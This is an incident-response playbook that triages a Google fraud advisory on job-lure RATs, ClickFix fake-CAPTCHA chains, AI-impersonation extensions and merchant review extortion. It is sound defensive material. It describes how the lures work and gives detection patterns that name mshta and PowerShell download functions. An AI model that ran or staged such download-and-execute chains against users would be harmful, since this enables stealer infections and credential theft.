IR playbook: triaging Google’s November 2025 fraud advisory (AI impersonation, job‑lure malware, and review extortion)

Google’s Trust & Safety team published a new scams advisory on November 6, 2025 that highlights three trends DFIR teams will encounter in the wild: job-lure campaigns that deliver RATs and info-stealers, negative-review extortion of merchants, and AI-product impersonation across apps, extensions, and malvertising chains (Google, Nov 6, 2025). The advisory also notes a rollout of a direct merchant extortion reporting flow and calls out protections in Chrome/Play you’ll see on endpoints during triage (Google).

Intrusion Flow

• Job-lure malware via “interview software” or test projects

  • Initial approach: fake recruiters set up interviews and send “camera/meeting” installers or trojanized projects (e.g., BeaverTail downloader leading to InvisibleFerret backdoor) on Windows and macOS (Palo Alto Unit 42). Sekoia observed 2025 “ClickFake Interview” activity linked to Lazarus that deploys GolangGhost across Windows/macOS under interview pretexts (Sekoia). ESET reporting also ties Lazarus job-lures to RAT deployment in defense/crypto sectors (TechRadar citing ESET).
  • Objectives: credential and wallet theft, remote control, and footholds for laterals (BeaverTail/InvisibleFerret support info-stealing and backdoor ops) (Unit 42).

• AI-product impersonation and compromised extensions

  • Distribution: cloaked malvertising/SEO, hijacked social accounts, and extension account takeovers that deliver info-stealers (e.g., Lumma) or backdoors (e.g., PipeMagic) while pretending to be “ChatGPT/AI” tools (Microsoft Security; Malwarebytes; TechRadar). Microsoft and partners also disrupted Lumma in May 2025 (394k+ infected Windows systems in two months), but affiliates continue to pivot distribution (email, malvertising, fake updates) (Microsoft DCU).

• “ClickFix” fake-CAPTCHA chains

  • Flow: victims click an “I’m not a robot” panel that copies a command to clipboard and instructs Win+R paste/enter (mshta/PowerShell), executing a downloader for info-stealers/RATs (Microsoft Security). A campus-wide incident on iClicker showed this pattern; guidance to consider systems compromised and reimage circulated after the compromise window (BleepingComputer). Kaspersky tracked similar malvertising→fake-CAPTCHA redirections to stealers (Kaspersky). Abuse of mshta (ATT&CK T1218.005) to run HTA/remote scripts is long-established and should be assumed when you see Win+R/run-box execution (CISA/ATT&CK).

• Review-bomb extortion of merchants

  • Pattern: coordinated one-star “review-bombing” followed by off-platform payment demands; Google says this violates Maps policies (fake engagement, harassment, extortion) and is rolling out a direct merchant extortion report flow (Google advisory; Maps UGC policy). FTC also documents how to report suspicious reviews from consumer and business sides (FTC).

Key Artifacts to Pull

• Windows execution and scripting

  • Security/Sysmon: Event 4688 process creation and Sysmon EID 1/3/12-13 for process, network, and registry writes (Microsoft Learn; Sysmon docs; EventSentry EID 3; Event 1).
  • PowerShell logging: enable and collect Module (4103) and Script Block (4104) logs for deobfuscated payloads (PowerShell Blue Team; Learn 4104 refs).
  • Run box and GUI execution traces: RunMRU (HKCU…\Explorer\RunMRU) and UserAssist (HKCU…\Explorer\UserAssist) for Win+R patterns like mshta/powershell launches (Splunk analytic; RootGuard).
  • Evidence of program installation/use: Prefetch (C:\Windows\Prefetch) for last runs/referenced files; note server/SSD caveats (Forensics Wiki). Amcache (C:\Windows\AppCompat\Programs\Amcache.hve) and ShimCache (SYSTEM\…\AppCompatCache) for existence/first-run/metadata correlation (windowsforensics.net; Magnet Forensics).

• Browser and extension evidence

  • Chrome extension stores (per-profile): Windows %LocalAppData%\Google\Chrome\User Data\Default\Extensions, macOS ~/Library/Application Support/Google/Chrome/Default/Extensions (Forensics Wiki). Review install/update provenance against Chrome’s external-install requirements (Win/macOS external installs must come from Chrome Web Store) (Chrome dev docs).

• macOS persistence and telemetry

  • LaunchAgents/LaunchDaemons for user/system persistence: ~/Library/LaunchAgents and /Library/LaunchAgents/LaunchDaemons (Apple dev docs).
  • Unified Logs parsing for installer, quarantine decisions, and persistence activity (parse locally or from collected logarchives) (Mandiant macOS UnifiedLogs).

• Campaign-specific network/UIOIs

  • If job-lure indicators are present, include searches for BeaverTail/InvisibleFerret infra and Lazarus interview lure sites (per vendor IOCs); Censys observed several BeaverTail C2 ports recurring (1224, 1225, 3000) - treat as hunting leads, not block-all lists (Censys).

Detection Notes

• ClickFix/mshta/PowerShell

  • Hunt mshta executing URLs or scriptlets and any networked mshta children:
    • Sysmon EID 1: Image=mshta.exe AND (CommandLine contains http OR vbscript: OR javascript:) (pivot to EID 3 for egress) (Sysmon docs; CISA/ATT&CK).
  • PowerShell 4104 heuristics: Base64 decode, DownloadString/Invoke-WebRequest/iwr/Start-BitsTransfer; correlate to 4688 parent explorer.exe within a minute of RunMRU change (PowerShell Blue Team; Learn).
  • Registry analytics: alert on additions to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU values (exclude MRUList) (Splunk analytic).

• AI-impersonation and stealer delivery

  • Watch for browser-origin child processes spawning mshta/powershell/cmd with web arguments; pair with Sysmon EID 3 to untrusted destinations (no corporate egress tags) (Sysmon EID 1/3, EID 3).
  • Extension hygiene: enumerate new/unknown extension IDs in profile Extension folders and compare to allowlists; cross-check if installed via approved Web Store per Chrome policy (Win/macOS should not allow external CRX installs) (Chrome dev docs).
  • Lumma affiliate tradecraft: ClickFix redirections (Prometheus TDS → ClickFix page → mshta/PowerShell chain) and mixed payloads (XWorm+Lumma); hunt for mshta→PowerShell→EXE sequence and staged JS/PS downloads as documented by Microsoft (Microsoft Security).

• Job-lure specifics

  • Process lineage from meeting apps/installers (e.g., fake video/camera software) to networked backdoors; look for trojanized interview apps named for meeting tools (e.g., MiroTalk/FreeConference) and Qt-based loaders on Windows/macOS (Unit 42). Lazarus sub-campaigns used similar interview lures across OSes (Sekoia).

Response Guidance

• Endpoint containment and rebuild decisions

  • If a user completed Win+R ClickFix steps (mshta/PowerShell) or executed a fake interview app, isolate immediately, collect volatile data/logs, and strongly consider a wipe/reimage plus password resets due to stealer risk. This mirrors guidance circulated during the iClicker incident (BleepingComputer).
  • Rotate credentials, invalidate browser sessions and OAuth tokens, and audit saved browser passwords due to stealer exposure (Microsoft Security).

• Merchant extortion cases

  • Do not engage or pay. Preserve chat logs, screenshots of reviews, and timestamps. File reports via Google’s merchant extortion reporting flow and cite policy violations (fake engagement/harassment) (Google advisory; Maps policy). Also file at IC3 for criminal extortion documentation (IC3) and follow FTC’s guidance for flagging reviews (FTC).

• Controls to reduce recurrence

  • Ensure Script Block logging is enabled and centrally collected (and tuned to avoid drowning your SIEM) (PowerShell Blue Team). Enable and tune Sysmon for process/registry/network coverage (Sysmon docs).
  • Browser hardening: restrict extension installs to Web Store and enforce allowlists, audit profiles for unknown IDs, and monitor for externally-installed extensions (Win/macOS policy) (Chrome dev docs).
  • Security awareness tailored to hiring and AI tooling: require official app stores/downloads; forbid “run this command to verify you’re human”; prohibit installers sent over chat/social; validate interview app instructions via official company domains (Google advisory).

Takeaways

• Watch for mshta/PowerShell launched from Win+R and browser parents, then reimage where execution occurred; sweep for stealer fallout (CISA/ATT&CK, Microsoft Security).
• For interview-lure cases, pull Prefetch/Amcache/ShimCache, PS 4104, Sysmon 1/3, RunMRU, and browser histories to reconstruct the chain (Forensics Wiki; windowsforensics.net; Magnet; PowerShell Blue Team).
• For merchants under review-bomb extortion, preserve evidence, report to Google’s new merchant extortion flow and IC3, and cite policy violations (Google advisory; Maps policy; IC3; FTC).